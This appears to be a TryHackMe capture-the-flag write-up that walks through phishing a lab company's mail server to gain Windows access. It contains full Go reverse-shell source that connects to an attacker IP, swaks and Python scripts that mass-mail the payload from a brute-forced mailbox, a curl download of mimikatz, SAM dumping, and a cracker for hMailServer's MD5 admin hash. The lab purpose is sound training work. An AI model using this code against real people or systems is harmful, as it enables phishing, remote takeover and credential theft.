You Got Mail

Test your recon and phishing skills in order to complete your objective. - by tryhackme


Last updated 3 months ago


The following post by 0xb0b is licensed under CC BY 4.0.


Recon

Target

We start with an Nmap scan and find the usual Windows ports (135 MSRPC, 139/445 SMB, 3389 RDP, 5985 WinRM and a set of RPC ports above 49000) as well as the mail ports 25 and 587 (SMTP), 110 (POP3) and 143 (IMAP).

nmap -sC -sV -p 25,110,135,139,143,445,587,3389,5985,47001,49664-49669,49671,49673 ygm.thm -T4 

In this assessment we are authorized to perform passive reconnaissance against https://brownbrick.co/. On the Team page we find six email addresses.

https://brownbrick.co/

We save these addresses to a file (emails.txt) for later use.

oaurelius@brownbrick.co
tchikondi@brownbrick.co
wrohit@brownbrick.co
pcathrine@brownbrick.co
lhedvig@brownbrick.co
fstamatis@brownbrick.co

Shell as wrohit

Using cewl here is not passive reconnaissance as the scenario requires; it is included for traceability and reproducibility. The password can be found directly on the index page.

cewl --lowercase https://brownbrick.co/ > passwords.txt

We brute-force SMTP authentication, using the email addresses found as usernames and the words scraped from the page as passwords. We get a hit for lhedvig@brownbrick.co.

hydra -L emails.txt -P passwords.txt ygm.thm smtp -I

Now that we have access to a mailbox, we can use it to send mail to the other addresses from an internal sender. Since this is a phishing scenario, we keep it simple and attach an executable.

For this we use a reverse shell written in Go, which we already used in the AOC 24 Side Quest 4 https://0xb0b.gitbook.io/writeups/tryhackme/2024/advent-of-cyber-24-side-quest/t4-krampus-festival#payload-preparation.

0xb0b.go
package main

import (
    "net"
    "os/exec"
)

func main() {
    // Connect back to the attacker's listener (IP and port from the writeup).
    c, err := net.Dial("tcp", "10.14.90.235:4445")
    if err != nil {
        return // no listener: exit quietly instead of crashing on a nil conn
    }
    defer c.Close()
    // Wire PowerShell's stdin/stdout/stderr straight to the socket.
    cmd := exec.Command("powershell")
    cmd.Stdin = c
    cmd.Stdout = c
    cmd.Stderr = c
    cmd.Run()
}

This has to be compiled for Windows, either on a Windows machine or cross-compiled from Linux with the Go toolchain by setting GOOS=windows and GOARCH=amd64 at build time.

Next, we use swaks together with xargs to send a mail with the executable attached to each address we found, authenticating as lhedvig. Subject and body are kept simple.

xargs -I {} swaks --to "{}" --from "lhedvig@brownbrick.co" --header "Subject: kickoff documents" \
--body "see attached file" --attach-type application/octet-stream --attach @0xb0b.exe \
--server ygm.thm --port 25 --timeout 20s --auth LOGIN \
--auth-user lhedvig@brownbrick.co --auth-password REDACTED < emails.txt
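The same step with Python's standard library instead of swaks, as an added example rather than code from the writeup: it builds one multipart mail per target with the executable as an application/octet-stream attachment and authenticates once with the compromised mailbox before sending. The payload bytes, host name and password shown are placeholders, not values from the room.

```python
import smtplib
from email.message import EmailMessage

# Constructed stand-in for the compiled 0xb0b.exe (not a real binary).
FAKE_PAYLOAD = b"MZ" + b"\x90" * 14 + b"demo payload, not a real executable"

def build_phish(sender, recipient, subject, body, payload, filename):
    """One multipart/mixed mail with the payload as a base64 octet-stream attachment."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient                      # one recipient per mail, as with xargs+swaks
    msg["Subject"] = subject
    msg.set_content(body)
    # Equivalent of swaks --attach-type application/octet-stream --attach @file:
    # Content-Disposition: attachment; filename="..." so the client saves it as-is.
    msg.add_attachment(payload, maintype="application", subtype="octet-stream",
                       filename=filename)
    return msg

def attachment_of(msg):
    """(filename, decoded bytes) of the first attachment, or None if there is none."""
    for part in msg.iter_attachments():
        return part.get_filename(), part.get_payload(decode=True)
    return None

def send_to_all(host, port, user, password, recipients, **mail_kwargs):
    """Authenticate once as the compromised mailbox and send one mail per target."""
    sent = []
    with smtplib.SMTP(host, port, local_hostname="attacker", timeout=20) as smtp:
        smtp.login(user, password)             # uses whichever AUTH the server offers
        for rcpt in recipients:
            smtp.send_message(build_phish(user, rcpt, **mail_kwargs))
            sent.append(rcpt)
    return sent

if __name__ == "__main__":
    # Assumed host/port and a placeholder password; emails.txt and 0xb0b.exe are
    # the address list and payload from the steps above.
    with open("emails.txt") as f:
        targets = [line.strip() for line in f if line.strip()]
    with open("0xb0b.exe", "rb") as f:
        exe = f.read()
    print(send_to_all("ygm.thm", 25, "lhedvig@brownbrick.co", "REDACTED", targets,
                      subject="kickoff documents", body="see attached file",
                      payload=exe, filename="0xb0b.exe"))
```

One mail per recipient keeps each To header to a single address, which is what the xargs loop above does as well; a single mail with all six addresses in To would show every target who else received it.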

We set up a listener before sending the mails...

... and shortly afterwards we receive a connection back as the user wrohit. The user flag is on that user's Desktop.

wrohit Password

The user wrohit is a member of the local Administrators group.

Furthermore, Windows Defender is not running, which we confirm with:

Get-MpComputerStatus

This lets us run Mimikatz unhindered and dump the local account hashes from the SAM with lsadump::sam (which needs SYSTEM rights, obtained in Mimikatz with privilege::debug followed by token::elevate).

curl http://10.14.90.235/mimikatz.exe -o mimikatz.exe

The NTLM hash of wrohit is crackable offline.

hMailServer Administrator Password

The hMailServer administrator password is stored as a hash under AdministratorPassword in the [Security] section of C:\Program Files (x86)\hMailServer\Bin\hMailServer.INI.

It is an unsalted MD5 hash and is crackable.
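Parsing the INI and cracking the hash, as an added example not taken from the writeup: a constructed hMailServer.INI excerpt (the hash is md5 of the word "password", not the room's real administrator hash), the [Security] AdministratorPassword lookup, and a wordlist pass with hashlib.md5. The wordlist is constructed too; in practice feed it the cewl output or a larger list.

```python
import configparser
import hashlib

# Constructed hMailServer.INI excerpt. The real file lives at
# C:\Program Files (x86)\hMailServer\Bin\hMailServer.INI; this hash is
# md5("password"), not the room's actual administrator hash.
SAMPLE_INI = """\
[Directories]
ProgramFolder=C:\\Program Files (x86)\\hMailServer
DatabaseFolder=C:\\Program Files (x86)\\hMailServer\\Database
[Security]
AdministratorPassword=5f4dcc3b5aa765d61d8327deb882cf99
[Database]
Type=MSSQLCE
"""

# Constructed candidates: a few site words plus common defaults.
SAMPLE_WORDLIST = ["brownbrick", "bricks", "welcome", "Password", "password", "admin"]

def admin_hash_from_ini(ini_text):
    """Return the [Security] AdministratorPassword value as lowercase hex."""
    cp = configparser.ConfigParser(interpolation=None)   # '%' in values is harmless
    cp.read_string(ini_text)
    value = cp.get("Security", "AdministratorPassword").strip().lower()
    if len(value) != 32 or any(c not in "0123456789abcdef" for c in value):
        raise ValueError("not a 32-hex-digit MD5 digest: %r" % value)
    return value

def crack_md5(hex_digest, candidates):
    """First candidate whose MD5 equals the digest, else None.

    The hash is unsalted, so each guess costs exactly one md5() call and a
    precomputed table would work just as well as this loop.
    """
    target = hex_digest.lower()
    for word in candidates:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == target:
            return word
    return None

def load_wordlist(path):
    """Read a wordlist such as the passwords.txt produced by cewl."""
    with open(path, encoding="utf-8", errors="ignore") as f:
        return [line.rstrip("\r\n") for line in f if line.strip()]

if __name__ == "__main__":
    digest = admin_hash_from_ini(SAMPLE_INI)
    print(digest, "->", crack_md5(digest, SAMPLE_WORDLIST))   # ... -> password
```

The same digest can be handed to hashcat or john for a bigger wordlist; the point of the snippet is that nothing about the stored value slows a guess down, which is why an attacker with file read on the hMailServer directory owns the admin dashboard shortly afterwards.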
